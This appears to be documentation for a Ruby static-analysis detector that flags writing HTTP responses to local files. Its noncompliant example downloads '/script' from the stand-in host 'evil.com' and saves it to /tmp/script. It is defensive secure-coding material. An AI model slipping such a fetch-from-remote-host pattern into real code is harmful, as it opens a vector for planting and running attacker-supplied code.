Http to File Access High

Writing to a local file from http access may hide unintended functionality. This type of behavior may hide malicious code, and introduces a new vector for attacks.

Detector ID
ruby/http-to-file-access@v1.0
Category
Common Weakness Enumeration (CWE) external icon
Tags
-

Noncompliant example

1def http_file_access_noncompliant
2  resp = Net::HTTP.new("evil.com").get("/script").body
3  file = File.open("/tmp/script", "w")
4  # Noncompliant: Writing a file from http access.
5  file.write(resp) 
6end

Compliant example

1def http_file_access_compliant
2  a = "a"
3  file = File.open("/tmp/script", "w")
4  # Compliant: Not using any http access to write in file.
5  file.write(a) 
6end